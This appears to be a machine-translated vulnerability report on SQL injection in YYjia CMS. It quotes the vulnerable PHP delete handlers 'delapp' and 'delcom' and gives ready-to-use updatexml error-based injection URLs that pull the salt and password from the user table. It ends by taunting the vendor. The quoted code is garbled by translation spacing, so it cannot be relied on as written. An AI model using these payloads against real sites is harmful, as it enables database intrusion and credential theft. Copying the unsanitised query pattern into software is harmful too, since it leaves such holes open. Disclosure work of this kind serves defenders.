YYjia cms front-end filtering is lax, resulting in injection #2

YYjia cms front-end filtering is lax, resulting in injection #2

YYjia cms front-end filtering is lax, resulting in injection #2

I looked at this file and found that there are still vulnerabilities:

Elseif ($ caozuo = "delapp") {$ uploadid = $ _ GET ['id']; $ lx = $ _ GET [lx]; $ SQL = "delete from user_data where zxid = '". $ uploadid. "'and type = '2'"; $ _ SGLOBAL ['db']-> query ($ SQL); $ SQL = "select * from ". tname ('appinfo '). "where id = $ uploadid"; $ appinfo = $ _ SGLOBAL ['db']-> fetch_array ($ _ SGLOBAL ['db']-> query ($ SQL )); $ logofile = S_ROOT. $ appinfo ['logo ']; if ($ logofile) {unlink ($ logofile);} if ($ appinfo [type] = 2) {$ dsql = "select imgurl fr Om androidinfo where appid = '". $ uploadid. "'";} elseif ($ appinfo [type] = 1) {$ dsql = "select imgurl from appleinfo where appid = '". $ uploadid. "'";} elseif ($ appinfo [type] = 3) {$ dsql = "select imgurl from wpinfo where appid = '". $ uploadid. "'" ;}$ dquery =$ _ SGLOBAL ['db']-> query ($ dsql ); $ andrvalue = $ _ SGLOBAL ['db']-> fetch_array ($ dquery); $ filepics = explode ("@", $ andrvalue [imgurl]); foreach ($ filepics as $ dkey => $ dval) {$ dval = su Bstr ($ dval, 19); $ filepic = S_ROOT. $ dval; if ($ filepic) {unlink ($ filepic) ;}}$ sql1 = "delete from appinfo where id = ". $ uploadid; $ _ SGLOBAL ['db']-> query ($ sql1); if ($ lx = "1 ") {$ sql2 = "delete from appleinfo where appid = ". $ uploadid; $ _ SGLOBAL ['db']-> query ($ sql2);} elseif ($ lx = '2 ') {$ sql3 = "delete from androidinfo where appid = ". $ uploadid; $ _ SGLOBAL ['db']-> query ($ sql3);} elseif ($ lx = '3') {$ sql4 = "delete from wpinfo where appi D = ". $ uploadid; $ _ SGLOBAL ['db']-> query ($ sql4);} showmessage (" records deleted successfully "," index. php? Ac = user & op = myapps ");}

Almost all of the white flowers are not filtered.
 

http://192.168.218.13:805//index.php?ac=user&caozuo=delapp&id=-1%20and%20updatexml(1,concat(0x17,(select%20salt%20from%20`user`+limit+0,1)),0)%23

 

 

Enter the background:
 

There is another one:

If ($ caozuo) {if ($ caozuo = "delcom") {$ commentid = $ _ GET ['commentid']; if ($ commentid) {$ SQL = "delete from user_data where uid = '". $ uid. "'and type = '4' and zxid = ". $ commentid;} else {$ SQL = "delete from user_data where uid = '". $ uid. "'and type = '4'";} $ aa = $ _ SGLOBAL ['db']-> query ($ SQL); showmessage ("records deleted successfully ", $ _ SERVER ['HTTP _ referer']);} access:

 

/index.php?ac=user&caozuo=delcom&commentid=-1%20and%20updatexml(1,concat(0x17,(select%20password%20from%20`user`+limit+0,1)),0)%23

 

 

(45app is the demo site of yyjia)

:)

You don't want to fix it any more. I still have some tips.